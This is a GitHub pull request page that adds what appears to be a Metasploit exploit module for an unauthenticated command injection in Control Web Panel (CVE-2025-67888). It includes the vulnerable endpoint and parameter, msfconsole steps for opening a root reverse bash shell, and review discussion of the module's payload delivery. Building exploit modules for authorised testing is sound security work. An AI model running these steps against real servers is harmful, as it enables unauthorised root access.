Skip to content

Adds module for Control Web Panel API Command Injection (CVE-2025-67888) #20806

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
JohannesLks wants to merge 6 commits into
base: master
Choose a base branch
from
Open

Adds module for Control Web Panel API Command Injection (CVE-2025-67888) #20806

JohannesLks wants to merge 6 commits into from
+201 −0

Conversation

@JohannesLks
Copy link
Contributor

@JohannesLks JohannesLks commented Dec 24, 2025
edited
Loading

Fixes #20788

Add Control Web Panel API Command Injection Exploit (CVE-2025-67888)

This PR adds a new exploit module for CVE-2025-67888, an unauthenticated OS command injection vulnerability in Control Web Panel (CWP) versions <= 0.9.8.1208.

What does this change do?

Adds exploit/linux/http/control_web_panel_api_cmd_exec which exploits a blind command injection via the key GET parameter in /admin/index.php when api=1 is set. Successful exploitation grants root-level access.

Prerequisites: Softaculous and/or SitePad must be installed via CWP Scripts Manager.

Files Added

  • modules/exploits/linux/http/control_web_panel_api_cmd_exec.rb
  • documentation/modules/exploit/linux/http/control_web_panel_api_cmd_exec.md

Verification

  • Start msfconsole
  • use exploit/linux/http/control_web_panel_api_cmd_exec
  • set RHOSTS <target>
  • set RPORT 2031
  • set SSL true
  • set LHOST <attacker>
  • check
  • Verify target is detected as vulnerable (time-based check)
  • set payload cmd/unix/reverse_bash
  • exploit
  • Verify shell session opens with root privileges
  • Document verified via included documentation file

References

@JohannesLks JohannesLks marked this pull request as draft December 24, 2025 00:26
@bcoles
Copy link
Contributor

bcoles commented Dec 24, 2025

see #20788

Pro-tip: If you write "Fixes #20788", then when this PR is merged that issue will also be closed automatically.

bcoles
bcoles reviewed Dec 24, 2025
View reviewed changes
@JohannesLks JohannesLks marked this pull request as ready for review December 24, 2025 11:43
@JohannesLks JohannesLks requested a review from bcoles December 24, 2025 11:43
jvoisin
jvoisin reviewed Dec 26, 2025
View reviewed changes
JohannesLks and others added 2 commits December 26, 2025 16:04
@JohannesLks @jvoisin
control_web_panel_api_cmd_exec.rb aktualisieren
0bfb77d 
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
@JohannesLks @jvoisin
control_web_panel_api_cmd_exec.rb aktualisieren
982f5e0 
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
@msutovsky-r7 msutovsky-r7 self-assigned this Jan 8, 2026
msutovsky-r7
msutovsky-r7 reviewed Jan 8, 2026
View reviewed changes
@msutovsky-r7 msutovsky-r7 changed the title add module for CVE-2025-67888 Adds module for Control Web Panel API Command Injection Exploit (CVE-2025-67888) Jan 8, 2026
@msutovsky-r7 msutovsky-r7 changed the title Adds module for Control Web Panel API Command Injection Exploit (CVE-2025-67888) Adds module for Control Web Panel API Command Injection (CVE-2025-67888) Jan 8, 2026
msutovsky-r7
msutovsky-r7 reviewed Jan 8, 2026
View reviewed changes
@JohannesLks
fix: - Hardcode endpoint path in send_request_cgi - Use idiomatic Rub…
c859f18 
…y single-line conditional - Remove unnecessary return keyword
bwatters-r7
bwatters-r7 reviewed Jan 8, 2026
View reviewed changes
modules/exploits/linux/http/control_web_panel_api_cmd_exec.rb
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
Copy link
Contributor

@bwatters-r7 bwatters-r7 Jan 8, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Using cmdstager is useful when we have space limitations. Are there space limitations, or can we just give the command to execute as-is?
If it is the 2000 byte limit on url, we probably do not need to use cmdstager.

Copy link
Contributor Author

@JohannesLks JohannesLks Jan 8, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@bwatters-r7 I tried to folloe the CmdStager docs pattern with two targets. Without the Linux Dropper target, native ELF payloads like linux/x64/meterpreter/reverse_tcp wouldn't work, users would be limited to cmd/unix/* payloads. cmd/unix/python/meterpreter works fine on the unix command target, so maybe the dropper is redundant? Happy to remove it if you think a simpler single target approach is better here.

@JohannesLks
Fix:n- Use Rex::Stopwatch for time-based checkn- Change CheckCode::Ap…
8bd24f4 
…pears to CheckCode::Vulnerable - Add cmd/base64 encoder in Payload hash for Unix Command target - Simplify execute_command by removing manual base64 encoding
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

@msutovsky-r7 msutovsky-r7 msutovsky-r7 left review comments

@bcoles bcoles Awaiting requested review from bcoles

+1 more reviewer

@jvoisin jvoisin jvoisin left review comments

Reviewers whose approvals may not affect merge requirements

At least 1 approving review is required to merge this pull request.

Assignees

@msutovsky-r7 msutovsky-r7

Labels

docs module

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

CVE-2025-67888 — Control Web Panel <= 0.9.8.1208 Unauthenticated OS Command Injection Vulnerability

5 participants

@JohannesLks @bcoles @jvoisin @bwatters-r7 @msutovsky-r7